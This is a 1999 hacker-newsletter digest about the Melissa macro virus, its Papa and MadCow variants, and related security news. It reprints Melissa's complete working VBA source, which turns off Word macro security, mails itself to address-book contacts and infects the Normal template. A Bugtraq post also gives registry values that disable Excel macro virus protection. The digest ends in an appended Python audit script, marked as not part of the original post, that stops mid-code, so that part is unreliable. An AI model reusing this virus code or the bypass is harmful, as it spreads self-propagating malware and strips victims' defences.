For more information check out: http://vil.mcafee.com/vil/vm10120.asp As this thing is emailing itself to everyone under the sun virus vendors should have no problem obtaining copies to analyze. If anyone wants a copy send me a message. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 18:01:13 -0800 From: Nate Lawson To: BUGTRAQ@netspace.org Subject: Melissa virus code Sorry to add one more message to this. I placed the code up on my site, formatted so that it is readable. http://www.root.org/ -Nate [http://www.root.org/melissa_virus.txt] from: http://www.root.org/melissa_virus.txt Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... 
by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And 
(InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub 12.2 PAPA, a new Melissa variant targets specific individual sites with ping flood attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ New Virus Launches Mini Infowar http://www.internetnews.com/bus-news/article/0,1087,3_89541,00.html March 30, 1999 By Brian McWilliams InternetNews.com Correspondent Business News Archives A new macro virus based on the infamous Melissa has been released into the wild, and it may be the latest phase in an infowar between hackers and a security consultant. According to virus experts, the so-called Papa virus is transmitted in the same manner as Melissa, sending copies of itself to addresses in a victim's Microsoft Outlook address book. But while Melissa seemed designed to snarl up computer networks everywhere, Papa targets a specific person, Fred Cohen, a security consultant in Livermore, Calif. The virus, which is transmitted by e-mail in a Microsoft Excel file named path.xls, attempts to launch a ping flood on Cohen's web site at all.net, as well as on the IP address of Cohen's connection to the @Home Network cable Internet access service. Cohen was among the first in the security community to publicize information about Caligula, a macro virus capable of stealing a victim's PGP private keyring. PGP is a popular encryption software package. 
In a posting to a security mailing list last month, Cohen called on the Internet community to attack the web site of the Codebreakers, a virus writer's group to which Caligula's author belongs. Cohen Tuesday confirmed the Papa virus is some sort of retaliation for his actions. But Cohen said there's been collateral damage to innocent Internet users, including severe performance degradation to the @Home Network. "It's not an eye for an eye. They're causing damage to the infrastructure and inconvenience to people who get the virus. If they pester me, I don't care and nobody else cares. But if they take down the infrastructure, they'll go to jail." @Home Network representatives were not available to confirm whether the attack on Cohen's IP address has impacted performance of the network. Many antivirus software vendors have already released updates to detect and clean Papa. Keith Peer, president of Central Command, distributor of AntiViral ToolKit Pro said Papa is already spreading fast. His firm is receiving dozens of reports every hour.

@HWA

12.2 PAPA B and MadCow Joke virii variants already becoming widespread as copycats modify the Melissa code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yet another variant of the nasty Melissa virus has surfaced on the Internet, this one with the subject line "Mad cow joke." The new mad cow joke virus is unrelated to other so-called Mad Cow viruses that have surfaced in the past, according to anti-virus company Trend Micro Inc. The new virus is similar to Melissa in that it surfaces when users open a Word document attached to an e-mail, triggering e-mail to the top entries in an Outlook user's address book. Unlike Melissa, which sends out 50 messages, this one sends out only 20. Also, it is a member of a group of viruses known as "class viruses," which store code in a different -- and harder-to-detect -- portion of a Word document. 
The virus comes with a subject line "Mad cow joke," a body containing the words "beware of the speed of the Mad cow," and an attached file called madcow.doc. The virus' creator even tipped his or her hat to Melissa. The last lines of code in the Mad cow virus read: "word/veronicathankstoword/melissaandword/class." Trend Micro hasn't heard from anybody who's seen the virus in action, but officials there believe they will shortly. "I think it's going to show up affecting people," said Dan Schrader, Trend Micro's product manager.

More variations coming

Schrader believes a host of variant viruses will surface in the wake of Melissa. "We're going to see a lot of them," Schrader said. "It's unfortunate these guys need to copycat." Most anti-virus firms have updated their software to ward off variants. "When viruses become popular, other hackers use them as a roadmap," said Sal Viveros, group marketing manager for Network Associates Inc.'s (Nasdaq:NETA) anti-virus products.

Because those roadmaps in the variants are similar to the original virus, most anti-virus software can detect and exterminate them.

Only a few get through

Most viruses created never reach actual users. Of the 35,000 to 40,000 viruses created by both researchers and malicious hackers, only 200 to 300 ever pass through innocent users' computers, according to Symantec Corp. (Nasdaq: SYMC), another anti-virus firm.

"The vast majority of viruses are not ever deployed or released," said Carey Nachenberg, chief researcher at Symantec's anti-virus research center. Although the source code for many viruses is easy to get, making copying them relatively simple, the ramifications of sending out a virus as destructive as Melissa discourages many hackers from doing so. The FBI has launched a widespread search for Melissa's creator, whom officials said could face as many as 10 years in jail and $350,000 in fines. Meanwhile, anti-virus researchers also are learning new details of the so-called Papa virus, a Melissa variant that is carried by Excel documents and sends out 60 e-mails when opened. Virus warrior a target The virus contains the subject line "Fwd: Workbook from all.net and Fred Cohen" and a body reading "Urgent info inside. Disregard macro warning." The Papa virus first surfaced Monday, but after studying it, researchers found a glitch that kept it from working, rendering it "sterile." But Tuesday, someone apparently had fixed that glitch, and the newer, virulent strain of virus -- "Papa B" -- was reportedly on the loose. Anti-virus software maker Network Associates said it's had reports of Papa B hitting at least one Fortune 100 company and two large firms in Europe. When opened, the virus also pings -- or, repeatedly hits -- two Web sites, one run by anti-virus expert Fred Cohen, the subject of the virus message, and @Home. Cohen suspects a group of hackers created the virus to target him because he fingered them in another virus, which was called Caligula. "They have made threats over the last several weeks," Cohen said. Just say 'no' To protect himself from such attacks, Cohen said he simply says "no" to any attachment that comes his way. Still, he believes that Microsoft Corp. cuts too many security corners in Windows, oversights that could lead to more breaches. The Melissa virus and its variants have been carried through Microsoft documents. 
"We are building a house of cards and it is going to be blown down every so often," he said.

ZDNN's Rob Lemos contributed to this story

@HWA

12.3 Is Microsoft to blame for the Melissa virus and variants?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.latimes.com/HOME/BUSINESS/t000028532.1.html

MARCH 30, 1999 . . . 10:40 EST

Melissa virus stows away aboard Navy ship
BY BOB BREWIN (antenna@fcw.com)

ABOARD THE USS BLUE RIDGE -- The wildly proliferating computer virus "Melissa," which has infected e-mail servers across government and the private sector, has made its way to e-mail accounts on this command ship of the U.S. 7th Fleet, operating 20 miles off the coast of Guam in the western Pacific Ocean. The Melissa macrovirus, which began hitting systems last week, comes in the form of an e-mail attachment. While the virus does no harm to an organization's data or software, it can slow down and eventually crash the e-mail server. The virus propagates itself by using a PC user's e-mail address book to forward itself to other users. But, thanks to a timely alert from the Navy's Fleet Information Warfare Center (FIWC), the Blue Ridge managed to stop Melissa before its spread, according to Cmdr. Michael Felmly, assistant chief of staff for command, control, communications, computers and intelligence for the 7th Fleet. "We got a heads up on what to do and what not to do" last weekend from FIWC via the Navy's Pacific Region Network Operations center in Hawaii, Felmly said. The center supports the Blue Ridge and the eight 7th Fleet ships participating in the semiannual Tandem Thrust exercise. 
The information technology staff identified three e-mails that had the virus and isolated them before they spread throughout the ship's unclassified local-area network, which hosts 1,600 e-mail accounts, said Dennis Kaida, a network and systems engineer from the Navy's Space and Naval Warfare Systems Command and who is temporarily assigned to the Blue Ridge for Tandem Thrust. Kaida said that by the time the 7th Fleet network staff had isolated the e-mails containing the virus, the network crew had gone to the Symantec Corp. home page and downloaded Norton AntiVirus software that works against the Melissa virus. Vice Adm. Walter Doran, commander of the 7th Fleet, said that the ability of the Melissa virus to make its way to this ship -- the showcase of the networked Navy with a high-speed fiber-optic backbone and multiple satellite links to the outside world -- highlighted the downside of such connectivity. In the not-so-distant past, Doran said, "when you went to sea, you took off the lines" and lost most connections to the world "except for a squawky radio." But, thanks to the high speed network and satellite connections, Doran said, "we are very much connected even at sea." In fact, shortly after concluding the Melissa battle, the ship's staff had to gear up to fight off the similar "Papa" virus, which attacks Microsoft Corp. Excel spreadsheets.

MARCH 30, 1999 . . . 13:50 EST

12.4a Melissa takes down Marine Corps e-mail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BY DANIEL VERTON (dan_verton@fcw.com)
http://www.fcw.com:80/pubs/fcw/1999/0329/web-usmc-3-30-99.html

The fast-spreading e-mail virus "Melissa" has forced the Marine Corps to shut down its base-to-base e-mail communications at least until tomorrow, a spokeswoman for the Marines confirmed today. 
According to the spokeswoman, the Marines are able to communicate internally within each base, but all base-to-base e-mail connectivity has been shut down until network administrators feel comfortable that they have taken the appropriate security measures to protect against the virus. Other Internet connections between bases have not been affected. A spokeswoman for the Defense Department's Joint Task Force for Computer Network Defense said the Army and the Air Force took their servicewide servers down over the weekend to purge them of any messages that might contain the Melissa macrovirus. Melissa began infecting systems across the country late last week and comes in the form of an e-mail attachment. While the virus does no harm to an organization's data or software, it can slow down and eventually crash the e-mail server. The virus propagates itself by using a PC user's e-mail address book to forward itself to other users.

@HWA

12.5 Melissa virus creator apprehended
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS net-security.org

MELISSA CREATOR APPREHENDED
by BHZ, Friday 2nd Apr 1999 on 7.29 pm CET

Melissa, famed Macro virus, that infected 100,000 computers in 3 days is still very active in cyberspace. Many mutated viruses are created, and not just for MS Word, but for MS Excel (x97/Papa.b - created as a personal vendetta to Fred Cohen, who fingered one group for creating famous Caligula virus that steals PGP keys). According to today's post to alt.comp.virus, Melissa's creator was caught. David L. Smith, 30, of Aberdeen, was arrested Thursday night at his brother's house in nearby Eatontown, said Rita Malley, a spokeswoman for Attorney General Peter Verniero.

13.0 [ISN] A hacker's worst nightmare
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the ISN mailing list... 
http://www.zdnet.com/pccomp/stories/all/0,6605,392297,00.html

PRODUCT REVIEWS
A Hacker's Worst Nightmare
Christopher Null
March 10, 1999

Stop Internet intruders in their tracks

You don't really want to share your customers' credit card numbers with every hacker on the Internet, do you? If your network is connected to the Internet and protected only by a firewall, you might be leaving your business--and your customers' accounts--wide open to data pirates. A firewall is a good first line of defense, but it's probably not enough to keep out persistent intruders. We tested three new antihacker tools and found a wide range of useful and not-so-useful utilities that help you plug the holes on your network. Internet Security Systems Internet Scanner 5.6 is an exhaustive utility that simulates more than 450 types of network attacks, then presents comprehensive reports about the state of your network. Internet Scanner is a mainstay with security experts, but it's also deceptively simple to master. Internet Scanner predefines several attack simulation packages--typically called scans--ranging from simple scans to special scans for testing router security. The simulated attacks are varied, including Windows NT-specific attacks, mail server vulnerability checks, and denial-of-service attacks (such as the Ping of Death). With all these tests, you'd think Internet Scanner would have to run overnight to get results. Not so. A complete scan with all tests on two systems took only 11 minutes to run. Internet Scanner's new SmartScan feature keeps track of the results each time you run it and uses that information to intelligently poke holes in your network, much like a hacker who keeps track of previous successes and failures. Altogether, it's the brainiest way to examine your network security.

Heal Thyself

Netect's HackerShield 1.1 is a relative newcomer to the security scene, and it's still growing up. 
HackerShield strives to be a comprehensive network analysis tool, but it falls far short in scope and power. The product contains roughly 250 checks, substantially fewer than the competition. And every time we tried running a full-network scan, it froze in midtest because of its own denial-of-service attacks. We never did get complete results, but with 120 checks activated, it took a long 25 minutes to scan two systems.

HackerShield does have its pluses. Its RapidFire updates are periodically available on Netect's Web site, and downloading them expands the number of attacks HackerShield simulates (about 50 are available each month). HackerShield also automatically fixes some problems, whereas with Internet Scanner you have to patch all the holes yourself. For example, both tools will find that your server allows an administrator password, but only HackerShield will fix it for you. Unfortunately, the autofix option worked on only 15 percent of the problems we unearthed in our tests.

Rich Man's Expert

Say you've patched all the holes you can, but you still want to estimate the damage should a hacker make it through and abscond with valuable trade secrets. L3 Network Security provides the solution in Expert 3.0, a sophisticated network mapping and risk analysis system.

Unlike the other two products, Expert 3.0 doesn't actually test the security on your network. Instead, you build a network map yourself (Expert automates much of this process) and define the threats from outside--and inside--the organization. Expert then provides detailed, customized reports about threat and risk levels.

Expert works hand-in-hand with your antihacker software and firewall to help you plan for the worst contingency, but its $9,500 price is steep. Even though this includes two days of offsite training, you'll likely find you have more affordable ways to map your network (with Visio) and crunch numbers (with Excel).

Internet Scanner 5.6
  Rating:  Four Stars
  Verdict: The most comprehensive security package on the market.
  Pros:    Exhaustive feature set; fast.
  Cons:    Pricey; cryptic descriptions.
  Starting at $2,795 est. street price / Internet Security Systems / (678) 443-6000

Expert 3.0
  Rating:  Three Stars
  Verdict: A fancy way to map your network and analyze its risks.
  Pros:    Makes risk analysis simple.
  Cons:    Expensive for the features.
  $9,500 est. street price / L3 Network Security / (888) 280-7475

HackerShield 1.1
  Rating:  Two Stars
  Verdict: The antihacker tool with lots of hand-holding.
  Pros:    Automatically fixes some holes.
  Cons:    Slow; not comprehensive.
  $695 per server est. street price / Netect / (888) 263-8328

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

13.1 How bad is Pentium III privacy threat?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From C|Net news

Pentium III: How bad is privacy threat?
By Stephanie Miles
Staff Writer, CNET News.com
NEWS.COM
March 26, 1999, 11:45 a.m. PT
URL: http://www.news.com/SpecialFeatures/0,5,34300,00.html

news analysis

Do the serial numbers on Intel's computer chips really present a major threat to consumer privacy?

Technology experts say recent reports of software programs capable of "grabbing" PC users' Pentium III serial numbers without their knowledge or consent shouldn't alarm PC users. On the other hand, those on all sides of the debate agree that no one should be overly confident about the level of security these microprocessors can ensure.

Nathan Brookwood, an analyst at Insight 64, reflects that conflict. "I'm not a good person at anticipating all the evil things people can do. But in my view, the whole role of the PSN [processor serial number] has been somewhat overstated," he said.
Yet he was quick to add: "When you have a transaction and a user at one end of the network and a machine where the transaction is being handled at the other end, and a big network in between, there are lots of ways to compromise a machine or break into a site." Even privacy advocates concede that it is technically difficult for a hacker to do much harm if armed only with a purloined processor serial number. But these groups are concerned that future technologies and uses of the Internet could allow grave abuse of this information in ways not envisioned today. Regardless of the actual risk, the debate has become something of a battle royal between privacy advocates and corporate interests. The emotions arising from the issue seem to transcend the mundane machinations of digital technology, introducing Orwellian rhetoric often reserved for such constitutional powder kegs as gun control. "Individuals should be able to control their identity and other forms of authentication," said Ari Schwartz, senior policy analyst for the Center for Democracy and Technology, which has filed a complaint with the Federal Trade Commission, requesting that Intel be precluded from manufacturing the Pentium III with the serial code. Intel's recently released Pentium III processor contains a 96-bit serial number hardwired into the chip. The number was designed to add another layer of protection for e-commerce transactions and to aid organizations in tracking assets. Independent chip analysts say the framework in which the serial number will be exchanged makes it difficult for any third party to use a nabbed number nefariously. These experts acknowledge that hackers or marketers will be able to steal it--but a number is likely all they will get, they say, not the key to your life. "All they have at that point is a serial number, and that doesn't really help a lot," said Peter Glaskowsky, an analyst at MicroDesign Resources. 
To take advantage of someone, he added, "you need a combination of an unethical Web site developer and a stupid Web site developer."

At the same time, Glaskowsky said, the serial number offers little in the way of added security. And companies looking for better ways to manage technology across large networks are not sold on the Pentium III either.

"Asset management now is not done easily--it's either done physically or through personnel," said Pete Jackson, president of Intraware, a systems integration firm. "It's a major problem throughout the enterprise, but I don't think a lot of people are going to switch to the Pentium III to solve the problem."

Security concerns have dogged the high-tech industry relentlessly, particularly with the wild proliferation of Internet use. On the software side, Microsoft has faced its own share of privacy issues, acknowledging earlier this month that Windows 98 collects information on users' PCs through the Windows 98 registration process and that documents created with Office 97 applications include information related to document authors. Microsoft halted the practice and issued patches for the security holes.

Against this backdrop, it comes as no surprise that the Pentium III serial number has enjoyed a short but tortured life. Intel revealed the serial number system in February, stating that the number was a third form of identification. In Intel's view, those who want to gain access to number-protected sites will provide their user names and passwords, as well as let distant Web servers send down an applet to confirm the processor serial numbers, said Pat Gelsinger, corporate vice president at Intel.

Although the serial number never changes, the confirming applet "hashes" it so that sites only get a placebo of the real number--and no two Web sites get the same placebo. In other words, if your processor serial number is X, one Web site will know you as Y, while another might know you as Z.
Another layer of encryption disguises Y or Z for the confirming transaction. During the exchange, processor numbers are further disguised to minimize the possibility that the true serial number will be intercepted.

Therein lies the problem to privacy advocates, who note that this encryption technology is an option for Web sites but that there is no guarantee that all of them will use it.

"We're not confident about [widespread encryption], no," Schwartz said, understatedly.

Turning it back "on"

The plan was to have computer makers leave the serial number "on," or accessible and open to confirming software agents. After privacy groups protested, Intel changed the software utility so that the PSN would be disabled by default shortly after a PC boots up.

Even before the chip was available in computers, a German technology magazine claimed that it had developed a method of circumventing the Intel-developed software utility. A Canadian software firm Zero-Knowledge Systems then followed with an ActiveX control which grabs the serial number before the software utility is activated, and after tricking a user into restarting their system.

But while these groups may have succeeded if their intent was embarrassing the world's largest chipmaker, analysts say that a stolen serial code does not present much of an actual threat to a typical Pentium III user.

Even if the disabling utility is cracked, it would still be extremely difficult to do anything with the serial number, analysts maintain. For instance, if a hacker wanted to get into private accounts, they would likely need more information, they say.

Most Web sites, especially e-commerce sites, which use the Processor Serial Number, require other forms of identity verification, not only to reassure visitors, but also to protect their own interests, Glaskowsky said.

"Any Web site that is intelligent is going to ask you for some kind of password," he said.
"It's inevitable that responsible online businesses will have a two-stage verification process. One of those might be the serial number."

Many hacks required

Pulling this off is no small feat either, technologically speaking. A hacker couldn't just issue the PSN to a distant server. The hashed number through which the distant server knows the user would have to be determined, which involves breaking into the distant server's database as well. Then, even if that number could be determined, the additional layer of encryption would have to be hacked so that the hacker can send a confirming transactional number that the distant server will accept.

"It's extremely difficult to [use the serial number] to impersonate another person--not impossible, but difficult," Glaskowsky explained. "It's far more straightforward for a Web site operator to steal your serial number than for a hacker to trick them."

The pervasiveness of the encryption layer dents the other theory of danger: unscrupulous sharing. Although there may be a financial incentive for Web sites to sell or share this number with other sites, there is no way to connect the encrypted number to an individual user, according to George Alfs, an Intel spokesman.

"It can't be compared to other Web site serial numbers," he said. "If sites are using the tamper-resistant tools, the numbers won't match."

Assurances fall on deaf ears

Many users, though realistic about the risks of using the Internet, are not assuaged by analyst and Intel reassurances.

Web sites "knowing who you are...is pretty much available through many sources, so don't sweat the small stuff," wrote reader Randy Dickson, who raised concerns about serial number thieves impersonating PC users in chat rooms and newsgroups.

"While I think Intel had their heart in the right place, they seriously misunderstood how this information could be misused...Some of us don't mind the fact that Big Brother may be watching, as long as he can't be misled," Dickson wrote.

Others, like Norman Thorsen, are more concerned about Web sites gathering yet more personal information about visitors, regardless of whether these sites then sell or share the data.

"Given this opportunity, marketers and, quite possibly government agencies, will collect as much information as possible," Thorsen wrote. "No one asked the customer about collecting this information--Intel decided to provide it without prior notification. By definition, that is an invasion of privacy."

Dickson and other readers are concerned about Web sites that will only allow surfers to visit if the personal serial number is enabled.

"Web sites will develop content that requires the PSN, so that personal privacy must be compromised in order to use the Internet," one reader wrote. "Intel's technology is fundamentally un-American. It is equivalent to installing video cameras on every street corner."

Many companies include serial numbers with their products, including software and hard drive manufacturers but do not share or sell that type of customer information. This is not necessarily out of any noble respect for the privacy of its customers, but because it would be against their own strategic interests, said Greg Blatnik, vice president of Zona Research.

"That type of information tends to have more value to the company that provided the product," Blatnik said, adding that many companies use customer lists generated with the help of serial numbers to sell more products. "Companies guard that information fiercely."

Privacy advocates concede many of these points. What has them mostly worried is the future.

Future shock?

"What's the damage that could be done from a hacker grabbing your PSN? Not much right now," said Jason Catlett, president of Junkbusters, an advocacy group supporting a boycott of Intel until the company removes the serial number, in an email interview.
"But if Intel's plans of turning the PSN into an e-commerce identifier pan out in the next few years, it will be used for theft of identity."

Catlett predicts it will be several years before the total privacy implications of the serial code are known. And by that time, he fears, such serial codes will likely have become a de facto standard in identity authentication.

"Every time you move forward with technology, this happens," Brookwood said. "Before they created credit cards, there was no credit card fraud."

@HWA

14.0 ICQ99 Bug, erh feature turns your icq into a DoSable web server..
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 29 Mar 1999 01:07:18 -0500
From: Ronald A. Jarrell
To: BUGTRAQ@netspace.org
Subject: icq DOS / possible "stupid user" vulnerability.

Ok, I was a bit surprised when, in playing with the new ICQ99a build 1700 v2.13 client (which I believe is the first publicly distributed one of the 99 family), I turned on the "Activate my home page" feature, and turned my laptop into a web server... Complete with a file server that allows by default anything in the "program files\icq\homepage\root\YOUR#\files" folder to be requested. Even set up a guest book, chat service, etc...

After getting over being astonished (yea, they said "turning this on might increase people's access to your machine, and tell them your ip address" - of course it will. You're setting up a bloody web server you idiots. A bad one at that.) I naturally started doing some poking.

Telnet to your port 80, and enter some non http gibberish. I tried "quit" for grins. Blam. Down goes the ICQ client with a GPF. Got someone else to turn theirs on, and sure enough, managed to shoot him down too.

I warned Mirabilis about it. Folks at institutions that worry about such things, but let their employees run ICQ might want to be aware that said employees might well be running web servers now and not even know it. On your ICQ contact list, if they're on it, said users show up with a little house next to their name.

-- Ron Jarrell
VA Tech Computing Center

@HWA

15.0 Russian crackers take out whitehouse.gov?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From wired; http://www.wired.com/news/news/email/explode-infobeat/politics/story/18787.html

Did Russians Get Whitehouse.gov?
by Declan McCullagh
3:00 a.m. 29.Mar.99.PST

WASHINGTON -- The official White House Web site was offline all day Sunday in what appeared to be its most serious outage to date.

A Russian online newspaper reported that anti-NATO crackers were responsible, but a source close to whitehouse.gov blamed a hardware failure. The site was down until about 10 a.m. EST Monday.
Visitors were unable to connect, although email to and from whitehouse.gov continued to work.

"They have a problem that is not related to an external attack," the source said Sunday.

The White House is a popular target for cracking attempts, but no content on the site has ever been altered. Dozens of break-in attempts happen every day, the source said.

On Sunday, a number of other Web sites found their home pages replaced with identical protests of US and NATO bombing of Yugoslavia.

"Russian hackers demand to stop terrorist aggression against Jugoslavia!" said one message on a Web site operated by Orange Coast College in Costa Mesa, California. Another note on the same page: "To Adolf Clinton: FUCK OUT, looser!! Go fucks Monica!"

Other sites that boasted the same message included cfmsd.com and darkarmies.com.

The Moscow-based Gazeta.Ru online newspaper said Russian crackers had broken into those sites -- and had pulled the plug on whitehouse.gov too.

"Russian computer crime authorities, contacted by the newspaper, declared that they would confront these hacking attacks with same severity as they would have done in any other case of unauthorised penetration into computer networks (punishable under section 272 of Russia's Penal Code, 1997). But the authorities went on to stress, that 'no complaint was filed so far from the American side, which would be necessary for us to start any sort of proceedings,'" Anton Nossik, who wrote the article, told Wired News in an email message.

Security experts said whitehouse.gov was likely offline for one of three reasons: A compromised router, a hardware failure, or a denial-of-service attack in which the server is overloaded by attackers.

Peter Shipley, the chief security architect for KPMG, said there's no easy defense against denial-of-service attacks. Once recognized, however, they can be dealt with within minutes or hours.

Shipley also said it was unlikely a hardware failure by itself would bring a site like whitehouse.gov down for a day or more.

"You can bring a router back online rather easily," he said. "It's hard to believe a router would keep a site down for 24 hours."

PSI.net, which provides the White House's link to the outside world, did not immediately return phone calls late Sunday. Neither did a White House spokesman.

@HWA

16.0 New Excel macro virus can bypass protections and execute code
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 29 Mar 1999 12:51:09 -0500
From: rotaiv
To: BUGTRAQ@netspace.org
Subject: Bypassing Excel Macro Virus Protection

-----BEGIN PGP SIGNED MESSAGE-----

With the sudden attention macro viruses have received over the weekend, I thought I would share a couple of items I find concerning with Excel macro viruses.

In Excel, if you go to "Tools - Options - General" you can check the "Macro Virus Protection" check-box and this should prevent any macro viruses being executed without your knowledge. This is true in most cases but it can be bypassed with several methods.

Password Protected Spreadsheets
=========================

If a file is password protected, Excel assumes this to be a "trusted" source so it ignores the "Macro Virus Protection" option. This allows any code contained in the document to be executed without the user's knowledge.

Here is a scenario that should not be too hard to believe: Someone downloads a list of passwords for pornographic sites from alt.sex and types in a disclaimer password such as "I AM AN ADULT". This allows a macro virus to be executed even if the "Macro Virus Option" is checked.

The solution is simple. Don't open any password documents from a non-trusted source. If you really want to open the file, type in the password then hold down the SHIFT key before you click "OK" on the password dialog box. Holding down the shift key will by-pass any macros and prevent them from being executed.

For more details, refer to the following TechNet article:

Q176640 - XL: No Macro Virus Warning Appears Opening Protected Workbook

Documents in the XLSTART Directory
============================

Any documents saved in the XLSTART directory are considered to be a "trusted" source so once again, the "Macro Virus Protection" is ignored.

The solution here is obvious but not so easy to implement. Don't allow any documents (or shortcuts) to be saved in this directory.
Remember, many users may have their PERSONAL.XLS file in this directory which contains macros they have supposedly created themselves.

The XLSTART directory on my PC is as follows:

C:\Program Files\Microsoft Office\Office\XLStart

For more details, refer to the following TechNet article:

Q180614 - XL: Workbooks in Startup Folder Are Not Scanned for Macros

Disabling 'Macro Virus Protection'
=========================

With Word, the macro virus protection can be disabled with the following command:

Options.VirusProtection = False

To my knowledge, there is no such command for Excel. However, this option can be changed with a reg hack that could be initiated from a batch file or from a VBA macro Shell command.

On my PC, the "Macro Virus Protection" option is stored as a dword value in the following registry key:

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]

To enable the virus protection, use:

"Options6"=dword:00000008

To disable the virus protection, use:

"Options6"=dword:00000000

This may not be exactly the same for every PC as "Options6" controls several options depending on the value of the first four bits. See below for details:

bit 0     Show Name part of Chart Tips
bit 1     Show Value part of Chart Tips
bit 2     Intellimouse Roll action: 0 = scroll, 1 = zoom
bit 3     Macro Virus Protection
bit 4-15  (Reserved)

For more details, refer to the following TechNet article:

Q169811 - XL97: Using the Policy Editor to Force Macro Virus Protection

Conclusion
========

I am sure many people are under the impression that if the "Macro Virus Protection" option is enabled in Excel they are safe from macro viruses. However, if someone felt so inclined, they could easily bypass this protection and execute VBA code without the user's knowledge.

I have tested all the above examples using Microsoft Office97 Professional with SR2. I found the references in TechNet but I have not searched Microsoft's Web-site to see if there are any patches or hot-fixes for these three items.
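
[Added example, not part of the Bugtraq post: an audit helper that parses a .reg export, decodes "Options6" using the bit table above, and computes the value that sets bit 3 while leaving the other bits as found (writing dword:00000008 outright would clear bits 0-2). The key path and bit layout are the poster's, for Excel 97; the host names and sample exports are constructed.]

```python
import re

# Key path and bit table as given in the post (Excel 97, Office 8.0).
EXCEL_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
OPTIONS6_BITS = {
    0: "Show Name part of Chart Tips",
    1: "Show Value part of Chart Tips",
    2: "Intellimouse Roll action zooms instead of scrolling",
    3: "Macro Virus Protection",
}
MACRO_VIRUS_PROTECTION = 1 << 3

_KEY_LINE = re.compile(r"^\[(.+)\]$")
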